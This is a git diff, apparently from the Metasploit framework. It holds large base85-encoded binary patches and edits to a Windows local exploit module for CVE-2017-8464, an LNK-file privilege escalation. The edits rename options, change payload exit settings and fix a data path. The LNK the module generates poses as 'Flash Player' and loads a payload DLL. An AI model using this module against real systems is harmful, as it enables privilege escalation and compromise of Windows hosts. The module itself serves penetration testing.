z+Y6Jw8h!y^HjX;sqwVO6eHX8@)*lO3i=4j|lNvr{xP25NWY>1I_@T&3U6(w=zJJTP
z^0#!_YxVX+hVONd-+DBm18Me;f^UJd)Dvq$7LL=o&(Qe_db??GBy02jw^KBO(pG&R
zaFAV&ZAZH#O*T@uRB^E`Qftm2qv(_&KG?hyMvm>wxFLy~U`ckQ`qR)`r$v1zRvJ3~
zY;blcmGsnvdM#Kw%x$1DY3C46;#Eq#U^%cEw9|rb!uTnRvvh0|(S-3nG~l)<+(v}4
z`;d9?r-pN}{+Z%(MWzlNdU**Q-nS*mf*?~9q88v{0@^Gdm86fd_BkSy!2U8TxqU15
z*Hl7Nbi^J*NJMm{5ncFFH224J`;S9DooUP};J5|7Slx3&$47UNMY{(V@7%bEUZJt+
z-+3rBHd8iI%W(SzU>F`Sbl!<_51~4KPwzlyWRrgP8>mTZqSEsVMx~GT$Fz}({d&pW
z8=p>L7V6PsGUeIYAJA9I$j$VYj>i5A=StC<UI~c=+OGx&<u%c678B9$Rt#TBnUoU0
z5%(duCr$B{ZZ~t4dyrfyyN^tEH-e;S4skF<;&4{Pxk?F)yl2Qz&8VCn9uQxREIl$F
z16AOGJ)Nd(JPd+&$g{{5nh)eMWnRkka_JdU^D3nj<KJ7DH{hD^yAUdG(jlh9Z&0;N
zkCko+UkZ;!Hl=lZ#vB={Mwhf^@5Fd{n&GLndife%q>Ef3x6?axIz6(7dB)vq=)52L
zhfbReo#;bFFBYkhkyVDs_y*MJehpKAqb$6hB)g7ND`5!V1A5tb0<Ast8m@y|4Nn=Q
z7dl?Rx9voG31_H$VZn=<LpZ9(VjIBdmbsyWNnO9^0gb$7?{EX@d@8wLxO*4$Yp1gj
z7Rr3)#*Y|w{g5fUG%5|^YXUy2gqZeVKPZhYcuBjaH>LxvyfoS<G1B-w%x}X-i8baD
zp&u)SG2c0jFhAo_&bKTO+=6LI7;nLPlIOIejt^Ie{ycfnD4|@m&}e^T*XLi;SFMAI
zV_1V}$dB}tq9R4=msjb-L&2eOZcz*ZDfWBiXxz-LsNqjx2k-8L1dL9{o=O)R9KK3C
zB6@Tzch;HNBD*b>?L|FeIradP%2?8(VMf}l=-aKTD>1#3H08J#sPd&zh=GuO@OUDA
zoAM=5`M$vRV^Rjkv<V6skTvkpRTKK0;TU7mF$3a-a*DktI3r#x>+P?I+0p^|Dm})3
zaJKF0*UO}Ra;0ASIy>b)LEamG5u<hxQ>j1xF0E&l-@rHu?#??9VE#pPtYzW=4Q8rd
z6AdvpCN{3ee8esR8|bVYcRgJyi6I=uSk?fi;Oopq*oDuNuVcb*!l>|&G#GrpFO|fD
z7~2;4fz^^mcPjH2|M7TyCRMmlp{6;SkPdyu&EKmIJr?^R_M+iU@H_>cw$#~Sqkn`E
zQ*m@6<L%g*Ia8y2Jn5nM!u&UO*p}X)_Q!vj+^CfAuPbWk!x80F+T~8eF8?&cuB$S_
zry><8nc^k<;V!v4&Hn0^>Dp>NinP#vO(>de{~#E{oUSGQYP`$akxV<yu{vb7p)viI
zrp68zt+Ayy1lR1QN~{J7!(rEUJJB-i>dHWYSfqN>w8-l8%<y}nl|L1q5jv;|^<>+B
zC(@NlPsw=lDnE*=BSPYJgg<>zVBZ5#=izr{Ibgmg<l^L3B)@{Wh2*Q4WLTP}Y+Z(3
z?W99TTv5V5jcmr^yO=*rM!)1|M!)1g+i19XQa-{Dj7t=?Qh$#kvQZKFe$v=!5QI+n
zYn-|U-}LmsB?^6kLT_jEXQ*e`b%UbV5T;|GvFlXn6((_d_^@aQ4I|57)A4F>SXp9c
z*nhFYdI-_-a|*(6lpzci2YM*UQp13cj%y@pk+UbA_8^AAX<z>{oo3<>E4#oMuABY&
zc#%uZtJZ$pzdtrtxgU&6$8=E?23II*n-%$$iu|tjWVGN=%rorTiZHFr2qz*{`b^Qx
zpMqnP`+ZrO{Q#z}OpjtV#nS$4`)9$}Dn5#gsIg1xXF(U76@QQAAE7v0m?2l{!iR&?
zp*;A%93J{^OfF4ZwU&{tJ0l?-di#uK*RpCC{qtX>%ADpmb_`QJbPl(OO4hL@zF<EP
z*IkccbRT8=3MK36lbBzPl&-5QF~3SJE7h_>ElbtXsg^di%u`E?S}s&elUin~WrkX&
ztL4ksNJw74TDG&2bff=}udNy0H9UT-(GFjIrLv7tog!)K`RaI}y6pO@Ys)GeUmcC6
zG@0_iln16fFy(<M4@`OBZ|#9L<YttY(L?`^N}tdl!zb*&wcIKGUkwket`R)``lf2X
zPxRIMS}J`3F-O=caDheqqWnd?jSIB-d@X^^47s$f)_vW)dGk2@L1#ltORkk+IS!vG
zO!&u&(o1n+Z}#4}Wzm*`Jo=+gvAI<+HF}y`f_}j<gDY!j@C$)}X?~lj$rCVneWvDC
z&yB*OfKV?s`@EdVw4&KB20bmyf`We=8z?lG8hw7#{07s8ZK4n`c|?<EoC|qyd<<Ct
zKFLvAn#CqlJ^t9#WZ61@E78??H+p?ryr#B*5Nz<7*xwI&NG|=sDl^`+S?~u4F~1=P
zU-JLtm<`RMDbV~aAxXQWyxd{RUUE&{0#jj*C5JazEqtNH%3Dp@i-iWC-(!MjmaJ4d
z7l9xru-TiFB+Bty^YU{GZ8?qg)`A6O*BSh*ITnSVjnDfWKXfkQ#|QpZ#{ISRpW^qI
z&Ht4Dru_Fm*)RUu@$$djfBueo&>lMV{COUDzwGGsM47!F|8R&h33+JS08W4?w6^8o
z%ttr(DSoq13>?Q*w6rYsG<!?=vwj&seN)f>1rJoWO=x-7W{#uZt+Y+TIk#Z$flC7<
zpDy6i{mIsu<#oXO0owt00UiK63OER$=T($3z!*S}UwW7UPCzZ74bTa=7w{+`3OEWF
z0el9?6!H5JfD=#&XaH;n+zR+-z=MFN00#lb0iyt2kmJ4vxDrqdr~)(rz6H1qa3A1t
z06m9L9tE5Li~`009DFhZZ~@>_KsLY%Z~_(sssT3uHUPW;dZv89aRIK}=S4m()`)&w
z32K@fYJGT>kweRUZQD@izRi{U1&=5ob+5<0pe#@q5d5H+u5oX|Er3Y40?iUZtP;F8
zicPG&p4zp(je_@TFKz~{EQ9Ah(_GsocvU{E7nc&Qyu}v~Dm}QW2;7fVSxbZX;T2@;
zQropnPyuqH$u@2~O+rgsuC>PNX$v&@5JN9>6+(+33g!N0vAG_KsrQvp&g~Ti|Ji7+
zQM1@D2vyA+{2u?dGH-)>YqOY?^Bn149`ySKuc+$F9sE4*>IUxlNmykxken`s{NV|R
zZol7$HIzZ^rM`w>i?F!4MYzV(D!{r6C$NhBZnF6sgjI!B3LdQT?S!e>7QpUai@RD`
zfOt@iyOnwrv6x8Z$7=U5Tyy=#av$z?9QR@haVcw|A7YK9T<wK-JT15ro$Zh-v{iy<
z^XJf9uC~etcPb3HLZwBn<2Gq0%_kSus!Hct7dQI@kbLt5<{J7P-4C?v%2+M<Sxk8A
z1*W3l=Z3V)g+Q=XNc#T<UCrn0Y9U;mw~0jxW~*LkqkAEIf!XD@>1tX8p^dv)S1b5i
zo4peO%W=2sYFh$u)Cx~aP~d)~`$8t%6FT*7%dB<dM*4IT1LNrC%5nRW7-kIpZQx2z
zv$)vjufYmx5w6|vO(Oe)ZYAO{xoDOOtv>%Yjw|HWt;6x`^9l$y?sjgSr!{cnI@aL+
zL9?zIlLKQ~xm?tJ8?ZNP)?wN<a(v1<b<7V^)&;Ou>st{QS8E$-8n{|*;}#NzpX_N{
zJ#3=6N3<YgR6nCyi{Qmy2U5*T$al2sf?meCK<C-u^NZYa-R8zN>;YmU`3v(+;lh4*
zNx!}PV^CJHqOAIAd|goUjSSFz72zB1<=42YCiKjPo_{H{1~%9G#iZqQntX{*y7KR|
zB$2-5jLw;8e~DU5iTbiV(6w`87N7;+@iN<|=KRZc|KC+!I;3kjZjR+^mTF6*Wt-(6
zEq7RsSw69(^5^p=zJOoNZ{j=o$N9bdA%1}Wkk?sfTF<jyVa>7HtsT}|tgl&roqJK<
zs=UU$Tk>AYyD)!w{*L@z`2+bU^0ftJ1@#5(1=hlw3-2x5Q}|rrn}u3irfr37gDqnF
ziR}g3C$^dPx%MLaf7<Ey|8pEwjygxkahKyk$J35M$9s<XMdd|nio8YtUbMeR<2>Iv
z*SXla!nwh@-T8gzzdCn2k2>SdPn|kfn(Go*v8%$><l5?zT(`UKbp6Qnfa@XGW3H!N
z`(4kwhFnXEYm3F=ZN;f2rV>|4Q_1F%CrSoN-Y?-yxXZx)bj#(Ia(G~+rN#0c%RgBj
zwj8kh#xiF4gC&Je=P%<I@VWdA{Cd8P-_G9yZ|vib@TYjK^&))Yz25q5c;Z&;PU}<F
zUh9DMm^C%GFt;*yLvC~Kw%mJjAISYl?i0Cta$~u_%hl(V<yGg^<*m&V^1OL>=RJ|P
zC-2$36M66EW#kv<d-A>cTl4SCzd!$>{73Tl=f9BucK&ewj|v_vc)Vaw!M=j?3ok8P
zSXfZ#Dl9Jy7k<C+UkZOx_(b9U!e15sy70Ba^KDtSMK-ss#^$kYwE1mYZ9TS^Y;W3r
zYa6lU+Sl3-*q^r#*k853Wq;THq5TtkierXjw&P;Q*Bn<mtPY3cDo2BZ{vQME_eM6v
zMXB<?CaADfTB?BO+Ld;iCDW2c?JlLQv*;~pmUIjEs4_O)VzD5hW_+gepo4>(P&C;0
z+K24<kW}sv9Je?gc0B1g=J>=hr|9yc%A#);-BvVMbe?mOv)1{d^Mv#F&U0Nh*Lqin
z>ps`xt^rrf^_lCk;*w%d@i&Xxi@S^W7C&EnvN*FOr({`)ucWgC0!$hvGsBu`<w}*h
j)ADr-w_d4tT3^ZK+B94SNV6<X%R?43UrYM^KYsoj+X)gT

literal 14848
zcmeHOdvsLQx!;qSzz72qHIb-6hB|0a$vtP@lX)bNL=Zs&3CPnBk_klea&m@;j~blJ
zlH+kS_F}bbsU_mAtW~_FUJBG_AR&R4+K9BEu@n_`;zSKsFH(HW{eAn)gn+ewv}@h9
z^m4Mkv-ke?x4+l^_TJw)IWv248`Cnzbbv&HvE3-?D&+Tnd}~4X*a<I;WjikV!^GX1
zS$~*VzN)s_)D&!78LX@~RaG`LG)krw0aGy4V5)5}70)R%)i+iL^2UrAWlpj#En#ey
z=Av^19cN>&9<52sVV42z0FZK-fDC{DVB1#ndYam$0ftEUwH<dfe&x`>u0nK~)NwR`
z#^d6}a>%7d6Jy?Vs(i<_nK9cx=-0I|mi>2z4ubEFzk^Sq@}$5z35~8S+(;p^b;t<R
zaV=-1%k!!$rApLu^tcItQGhD|!>&TMydy8D5|-0s76OQu88GZBWI|!yisoiQ?I60+
zVV%ROEyORN^5Z^Qj!yWR<qji4mGi4r>9`MJGaCW8?pt&nc}4Te33~(GS^&h4>=|}}
zUq_x)$MrK2z70Th7HXWmI9)JM*I1RDo6YDWxwf-3R0G|#b1@fM=X;<mJdoX^Gq(UA
zD@82IowCjxTYxBw^ljN%wr%y6XK<6o^iaI8a96h2v7{5lZd!CpI@@kt01g>Sx!D{!
z6biPp(rv3F9ma>U&>fCx#6HDdcn6peK5mSzVUQIAtHhtf1G*Q8hkSI<`0K1~5EAJK
zz0<xOmGJ2_W9xh91MvhDvA<?wV<O^kSH_atD)t(fd@B0VwLq}&84d3Vov3c7bts-v
z7U~oq35}0~Ja?zD)qtTXxkn&Z9)!s8Ns-6IzNAo%v2`LSc?&kQo&>wIUE|Od=`*(e
zp0LG*q^^_$yK{Sr%{mHFx!kNr+azb26TRU9LpYs`)<9*|S6uHlv7_IaNF;{zZzms<
z%iq8Pk95f0($seHIH5X#k~_n3o%`5YqoRet&(KKpx{s|nDcj7k?U%x?bfSiM)QA<;
z#EzbH@*~ynPbWLib>55Q%Ki~hqo(bC?uY*C&}fTF*D$gsqh;G__)AX(XGHX|d63pW
z@J%9-nw6Uf(MJf3(Wzq?idZh!i!>m=^ml_~$lm$4%70u?CU?tkga>jWhvY21YuoD3
z`efipWibV3fqb`FPfRhIk)eM>#K5ESzDS>x9{y4r$|DMSsaZ$8i!Mp_4o6mhok(B^
zVk%AixF?;Yz{EtjD@TqYgqC$icU(j4V^>06v?wubZ1}Wh?SrwaQw*e6hxNq<F6P28
zQ~N?!hriT>+NpQAvLAiLCC4A&{v?v7*iM*|q9bRL+Gf=#;$)00hHfbWQi}+*NvqG}
zf4i!|`P9v-*#0-k+sPq3EWzowsBr)Fzlh%GPLhyXKLa^E=}pOCp=FE(C0(J+GUqDA
zW>ai7=;1T0xTL=j<%ZZum;+iv{7Bn;`F-pl?b+}z;?s-RV1;mXRwfo8mRh9a1rjD*
zMjjfA9>jGbE1P%f<-L(Z(nT0TqZ5Zv*_?^+>4&xlQu71;%R1Z6Uh~Bc`F&-+-cw?b
zMs{Q26~;eb)(I+XMA7I=aKeUxIyjEx86a6Um}C3l+@1*a5vC{7g&NHQX!K_2M6`TX
z4AAZKCQ=-MV{E+>NV!|_WkB7;5#KHhF}5xNGI1n)I^Eb>ifS}^6x@hIaZ(yhWi+y%
zuo3Fx_*rHXXmUV8QhCB47n{wfXHq}P4AKB4sYoTA_f+bpkcMz8u0+;pu3au^cL)e2
zau5=tFXtdwdm?n#G7UwVj{DgJ#TBl~ym=&|5JR|#jHCz%ArU|`KA@COOePKiVAYW{
zj{5mHm0r(;<U}sz0!WAOK&JfUVJI*p+%?oUcP?jc8$y)v_8@FgW!yT{E=AxcvZ$vt
z8u*+qR32ga@I3}iC_Q#5;*oD=2N04qZ8dE;eR7BP(1&TooK8UbY-8(vq%?Lh6tRcK
zV$)9Tw6&ljlA(Qep^C_fVusM6N14qXP;3^US!@+X%bf~g(aHxkKN*3@A;e@Ll7jeQ
z85<k}HM(-;qc|TyL_88%>&Uf0b`lx~)7kY05)<(e5jdFGO&wTp#+@Bs9HqE#XIL8w
zP6lZLqOztf(aSN>Qk_z$le4H7dt86G%kWtz?ca2sE919Mg0L?W(nM^ShD7F*ydBqs
zKBqM{4r?p|S>dkiC7ohlJWcM57HO2s2vOk_AB-P3t6#gWlq5(aKkHP_hjc<vtj0Id
zs+`XgfE(H~pvbUL!GX<~@0Je=UzChr^lr&SZ@B9Qb>l@qagXGXM+S7tQgeoNsW~%|
zr3XUZm&h_u*^|gJQ`yaDgFGlC=`j!DQ7fD;#>CU&pekjYy!VSkTSyBzYq+!*wqO2g
z@$NZLB>oQhheuOxPddYvcae^DC?&e+d|gkv4sE^y)s-e^oq(BJj?&G5E~P}j<scf|
zPPt^Ton*)*pC_`ss#b8Umv4Nt)OI3EhYBq&lEUpR<~{n@fzilpQx{G_r5L;JX|0qA
zH><e<0s!I7{f%ulHyMj2$}qqwwja4}@<iu5^YHzg(y`32&j9t(h_N)PC!IGiAIPhu
zOK`eL`Qfh2WKse-FXpyvTm1^%+{dK%d7hDm45kxlN9g1^ln4v(<QWh7iq;C+Ja}!;
zDZaG^`OWa%x{cyr#{)AN@4THd9wo(Vdz0!a{gq%!E+gjArPv;I<{5BmxT6rF46)tF
zO1ZqH@B_&BIO>E?>d+T!#4SE%822_cKNS@FI!t2Zl<}cA!CLX%jh5IKy;awyjB@W;
zJ65?<r=6pB?>FA}Jo>|(n($tO`?Juy;4F8?W{l*iS&y;xD2=w$=xEN8J@2Jyj>$Lb
zd+5=F#Vpuqw9^gpjXFeZCd|;&cF*;s0ZMVUx+yQ@VSochs)sST(bBKN?|vyc!m+~e
z@mHlhGEh67Mi7g_Bnx0Ok?$CwP$H|GbI1UPtZ+IRrU`cmSX)@k{WGz!6Ipa(!Fjvk
zJW?R`Q*4{<Lt4<ZP1mEpHPycc{jy}%0ap!NtOjj0O;AtP@W3o(yaY+uPsXG+=Hz}r
zXqvFtBk)61R~Xeru0nH9Ot<H_F7_ZD8C*%=*yJwwW<vP*;1*J5cX`pa)l=veK0Wfs
zTf?VE8y~6zt9C+RCyd;WA?*u!BlP3;rKr5JT<vPT33RUzopPfdA#IF|pd6>$u;Cj*
z8pF534f3)MWrT6(0=@EMU34S8HBegU9zK&1{W(?Sk}hNG<=_-PV=}gG<Q2WKbs;KP
zYvhg0sqn@^9BW)wiuoCG*Rn3!PrzEaEZnWvK1K|q&=_prh($0&rIxv*;1Ok6S33{F
zj(e}@|Lu@}5o@0Dgf~W?A*6Q+pQotpW%8G1P{}}!^j38C!J&Yfg_9XuKLx^2C>dMd
z1$DG!KdlpWqIJ7b*DEDQDFBp`gTo^yE)V77st^5<gfVgzT&CQjiySbvJ_}X)$D(cA
z#qE-NairmKA^a-Y$BZ+2m6EQ>zti-}V0<+87!m;Eu9AZ_GPnQiG~9PL7%9s-xaIvC
zVz~2C`N)Ppf?1-)14c*Aa+yn9c9tC6sExl&?DuQ6a*ry&fiBq-|AjJ!;zn~)nX2Q~
zP1P%f=LGU|UxE+@W9p6<V(Okm`<(qiJ+E@mzY&}gSqv*h8Q+3B9Ys@SP?INoi1b|A
z@3iE&KhaZTcj5?+T0`WNq*sdQ$s^ILEYU~$LVZKrZs03Zhy7bU>ejFYW#TF9$nC9=
zfYBM)PvyZSx8X2VpFc3IJWmA+L>-Ggfp<-KB<Pfi6l?@Z#<CU-vs|Q8^=(h8D|5Y5
zG)4MER#Lt^2r&@y3cQ?%KbTDTF?WpT2V5B(yCx`PL>54g^h5fb<Cv_ZB*fr2CC%L#
z8Wr~|diR@BuDn;7rpNe`=i4qKeL-H4;-}2e%QN|@l?Kb=uVd5}Vk-B>KN`wcU>vRC
z)`y{Ba0(q$**FkG*-5WS##jmBD6YqR#I8rS3JL1*)!CLLF-9U7%NyVnI>udu4f0}T
zAr~IOs7RlDH1ugtI*BJ&^rX|I@LI~~ubOxq#Ge{kA1M{asnj$_XQe}*A@g(9sgECt
z{S0fr{|<Pb0#94$-Qc2^oYDxf16f^X&4zW^qczC#c!QshH5**B7fb0lI&0eEuO$N`
zd0s9kqX#X@k+k!?#$CY?#$D4gBd4OpY1z`1;(<1$)Zl(=?MQ8@-u*_<5Z<E+cjUTH
zhGLl0+bGSXco+L9%eWhfsMj2;Lbe({tzSF3W`mCwGbE2jydo>5r{cEVgp1t>?cu!-
z+r4NRceQ1r!1Pgl)rjcQjO@tA(zW6#vLBlarPw^}&oRfo!ZwVN&xN}+;m%z5C!u3t
zF2eJiJ@SJ?XXR?;-p&POs>H*XV2qo|CBj_8aH$*Os_do_(Q?Q>B~26$B;BM;Gq^j0
zBem1?D7gK5Rr?Rgy|m2Em#0dj^9|BIP1!dBra>9lGmO3rPr-U=Ecgt|*VXaYsN+wh
z#t-w)LRH5;DM#!8zf;q$HAy2Q2c+HMe#{LLi(L27P`^m(ohMHsf2jPs5kip;UN@HX
z0zDLuV#hH5Azo7c+r&o<^IsG%PiekdNVk*&gCi(#;6M``$kRrOpEuw?9zU0y8$X|c
zzfx#ka@!ZZdtwvfgS1|6T_Bzs(x8muQZmqnR?(^QQ}rLAYV!g2PwMDxfg*7F>&9K{
z5yf*eBZ+AF#o5vxWv0QsA1cg50v5c40tY_&1|fV(Wy}LFWQc!C^22d>F;kg=V=6Qf
z%426b66w1)rZgFrZ0IJF<v}PjwCDG|ceYN*xurgO-5#A~HUzUa^iw^25t~9K?^qk3
zya$Mdi!h9yFZn)0$$0WgOnL$fy{#=V>G5Q_DOt89%LkL?#$?%=EL)Q0-N{l)mUYQ;
zRkEz+CCR2g<X_ABANyqJ6r&w|GoI6E+oC#^|H@T5b<wOjQ;YNe6&@GHUhu#L4_xrT
z1rJ>Czy%L{zdX=^T!Qilx{$gvdS&}-yfXcMS#d$zf7SzawJTOu-9ANh<W<+zv5J{%
zD&_@N);3FlU{PIVb90~>jAu93%nspu6^8G4KxMV$1=a;fAReDhcq!g{IUXZx8&<BJ
zvesdvkA0-t`hcmXvbHW14CIeuQ>&|kf#zn@q$bm<%4SnTqp7yOa%EsjbD&D9ZERpB
z(}LQd6soM78wv#1^MQeCQ%z&gG^yIOV!ae-HdRWd${{W!dT2~(uu%e^)Tp(!(kfFG
zJ~A>1>n5!uy7>*O8yeR(n3|dcq3T8x|8As`<kE*qQe#zPooP)V*i48?)p>Y>{13;h
zsFh63wRZ+mw9|`<@=dwZZ<#;Y<jAw;2_}mmIt9Dv0G|te|3Cdg@%eqa?$w4Dk-oXh
z@x~ct3T$Y*0A7F;sBhw11p1%8j4?lOj1||_&91C%C=@N!x^R8}Jm76QtMdtoG5T(C
z`!JjkVyya(voynN&j9~CU@zb>U;v;C;(JIy9-tUd4p;@a6R-)e6|fs{7%%`Bfdl3;
zz;%EbfKos;AP9H}uo>_?U@w5KqbNTBd`@lXs|RENt^oW9a09>rC<M#|lmnImRsrbx
zKI&Y~is~Ah12Zad`Ucp~Sy3=hDFyhEJQW^Iws8<v;gkjDPpmjl7mxx)!CI-ds<N&u
zdCs0>B@J}2pND4Mn&|<lC=?6^8l)r_*7I%LP1Wr8!?5M6phh*2EIke5XH_;!CBa}L
z=5!pjXE#=d>XJG`r|E<v=E-D$v3m$pwjQZQeL3=lsm(Xm)&;1>6zWmg7d1j-`cU>~
z99LVlx~LKP1!Etl-P8c<D(i3-pKnmEc2=Nr&9~6(aV<|UN&`XU7WI`4RRPW{5M*y_
z=LMQW^#N5VK5W#LeM^IS!p(13#b=?qWL;IDiLwZ24WF_*b!BydKoi@jD-Q(gYa1{@
zDOa+Gb>(%<Flj+$T`0hw(0wNpwnLZ9gr?Tv>(&zFFE6Dq;6`~4W3Q$#+!)5b(cOv(
zO-Y*_sBa9er%!7uDv+x+HU!qyO6(q1QCZ)-vVu2Qwx*&M&V$<ZEC=<*6_^c81thL!
zSEN-W$L!VC1OrI(ey^=rO9B}CLR()+dNDRh*DM9=0u78^OSOio`X=^lT1BXV^Ei`M
zxuP*Bv7l~EO;fP8L8`$QGg<^9AB#mu`^*0!+*~s6mXcXWTPelGl?mDZEYvrzsR~Ld
zPQ>j8bY-aTmB}K?>01ClAnPue@?9Qi+qOCfP>1Ka?3N32{#|bRLE<y$_cx4<7k(tn
z5mpE*h5Lmz;fQcXNEa^^O`=0wDsB)riF?I^;!*KkG0l=`xzaMxGQ%>*ve>f0veELP
zCEYgNHqW-uw!&6t3)v#JhiuG#vE6Kc+Wss1U+iNYc8A}w*s<DimqT$p>e%OqJHB!_
zopYSE&UWX2IbU`D+4+I<znuoxM3==i!&T$D%k`jZlj{lBFI}&>4!cgf^zO^uSGlit
zU+)&&F85UT&F;DG#qQPaBkmJ!UH(P+k^Ig1FXzYdPvzS@0Z-8Lm}iG)kLS;xzj)%F
zuRRxgulG*#)_B)>@A2N}eboE3_m|%7-j}_HydQZ7y?^sg@J;spn{TGC)VIu6<*WBa
zeE;ry*>~9YiBIGIkzeqa`WN|E`nUVL{crit_*ub-0%Ji|!Hj}i3RV@g7i=&1O~ES#
z`wCtw_@4r1Qh%~?sc^Y4K`0hx3X<@Yut#`JI4XQ5d@bn3vEoGWda+2nN&H&8*fPO#
zjpcev$P%_ZVtK;SZh6-7zU8DPVHsh~vWnIM>y6f%tr6=Z)+epMv36QtxAs}zwZ^PY
z+gw|PEnr)1d&c&f&0^2DPqWXo&$BPKudv^458Cgv-)Dco{uBESJN>?fe@^T|<QA$w
zGx7?B&<yPswQUfxg&b<PscoI07Yss%z_#N(2+$dVAe0Ilg{{JIfgv86#5Qreh>i}G
z_kA=L-!890@wUt6E^|NUe%}3}yUYEddsP0V`HuWW`FG{F=KmspfBr}L2G2szBcA6x
zhdpz>)!y~qhrGMJ$GsX~j?dzo=Ue5w+qcE{s_z}&M?U7C==b_(`X&G4{{Qs9?*G)U
zgMT&L9=!#^nl$|9NS9bdOT9(0{Ms_wnrY32-}0@uSyx({tgY5XHqdR?@Sj&bQ}BGj
zo`Sy?unx6t5UvpH!Yu;JNaH^(+rj6lPpBc=gfwy;E3#GE!nUVv2W=nNa_j>9Ji|U0
zK7QK%q5Ug+x?`+koZ~Gg2ustL7sUx+FL7Ms$al<j1RU!f&pGxu{^U60xXL-rxzzcn
z^LNfUt`^r;*FM+B`5I4_XR>FPhiy*d`n~U)=0D~K6Q*TIsoCW=mu<1_F56Ebd#rsv
zq&{l@t^JSoGxn<-Hb;dcjFt2(B)sV8ar}=X!#T-mb$Xmnx!%Ki(YSN?Iw^B6!YaAL
zeXsi|_wU?qyFYP{&Y$i9bCZ^pqsa2uJ$pUxcqV(xyi2{edqdt<?@zq#-WR<4ysvrR
z_TK1w!1sjjY2Oat3%(D1*Z2$l^ZX0_HU72!hyDM7S=r^^=Re~Ai$6|!3tDc+?Se%N
zhyx;P(Xv@U7ut5(j@eGyM%iz%KV|Q>ziFS~@Hr|S4>(RZ^iGGf!Wnk%bbjg_=eo`n
za`i&{k<fm?ZOXqHk>m5s_nh#sUM-*ZmuWun!?sM^AGhqaA8?j>B=7P9mZ9Pfi+{7e
z>zL`ff&QCq((#|S<p?u`9fD1)M%=z69>xd5IhMOETP<A{W;I)F)`f_a9oEy<V%vkZ
pE?XvcEt`FzeVe`4e%!8eWIARzwmJ^d%e+Dz*Wo5R>OY|Ce*s3p7Bv6>

diff --git a/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb b/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb
index 6d2e32a57d..1b316ce6bb 100644
--- a/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb
+++ b/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb
@@ -47,8 +47,8 @@ class MetasploitModule < Msf::Exploit::Local
           ],
         'DefaultOptions'  =>
           {
-            'EXITFUNC'    => 'thread',
-            'WfsDelay'    => 45,
+            'EXITFUNC'    => 'process',
+            'WfsDelay'    => 30,
           },
         'Arch'            => [ARCH_X86, ARCH_X64],
         'Payload'         =>
@@ -78,14 +78,14 @@ class MetasploitModule < Msf::Exploit::Local
     register_advanced_options(
       [
         OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true]),
-        OptString.new('LNK_COMMENT', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']),
-        OptString.new('LNK_DISPLAY_NAME', [true, 'The display name to use in the generated LNK file', 'Flash Player'])
+        OptString.new('LnkComment', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']),
+        OptString.new('LnkDisplayName', [true, 'The display name to use in the generated LNK file', 'Flash Player'])
       ]
     )
   end
 
   def exploit
-    path = ::File.join(Msf::Config.data_directory, 'exploits/cve-2017-8464')
+    path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-8464')
     arch = target['Arch'] == ARCH_ANY ? payload.arch.first : target['Arch']
     datastore['EXE::Path'] = path
     datastore['EXE::Template'] = ::File.join(path, "template_#{arch}_windows.dll")
@@ -105,8 +105,8 @@ class MetasploitModule < Msf::Exploit::Local
   def generate_link(path)
     vprint_status("Generating LNK file to load: #{path}")
     path << "\x00"
-    display_name = datastore['LNK_DISPLAY_NAME'].dup << "\x00" # LNK Display Name
-    comment = datastore['LNK_COMMENT'].dup << "\x00"
+    display_name = datastore['LnkDisplayName'].dup << "\x00" # LNK Display Name
+    comment = datastore['LnkComment'].dup << "\x00"
 
     # Control Panel Applet ItemID with our DLL
     cpl_applet = [